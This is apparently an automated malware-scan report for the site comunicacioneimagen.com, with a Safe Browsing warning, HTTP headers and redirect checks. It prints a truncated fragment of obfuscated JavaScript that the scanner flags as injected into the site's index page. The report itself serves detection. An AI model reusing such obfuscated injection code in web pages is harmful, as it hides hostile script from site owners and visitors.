Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=comunicacioneimagen.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.comunicacioneimagen.com/ | HTTP/1.1 200 OK Date: Sun, 18 Jan 2015 11:55:35 GMT Accept-Ranges: bytes ETag: "3f90337a481cb1:565a26" Server: Microsoft-IIS/6.0 Content-Length: 12274 Content-Location: http://www.comunicacioneimagen.com/index.htm Content-Type: text/html Last-Modified: Wed, 10 Nov 2010 18:24:14 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://www.comunicacioneimagen.com/index.htm | 200 OK Content-Length: 12274 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function wH(){};gZ=false;wH.prototype = {o : function() {this.i=false;var u=function(){};this.z=false;var oD=new Array();var n=new Array();var t=new String("boH0V".substr(0,2)+"dy");var wO=function(){return 'wO'};var h=function(){};var e=function(){};var g=false;var w=120;this.j='';gD="";var zW=function(){return 'zW'};this.s="";uY="";try {this.bS='';this.nE='';zP="";var v="v";var kX=function(){};this.aF="";var a="apw2v".substr(0,2)+"pe"+"kS0CndCS0k".substr(4,2)+"vEcqChcqEv".substr(4,2)+"il"+"dsQ Decoded script: function () { bC.o(); } /*** called setTimeout with function () { bC.o(); }, 120 */ <body> Antivirus reports:
| ||
http://www.comunicacioneimagen.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: comunicacioneimagen.com
Result:
GET / HTTP/1.1
Host: comunicacioneimagen.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: comunicacioneimagen.com
Referer: http://www.google.com/search?q=comunicacioneimagen.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: comunicacioneimagen.com
Referer: http://www.google.com/search?q=comunicacioneimagen.com
Result:
The result is similar to the first query. There are no suspicious redirects found.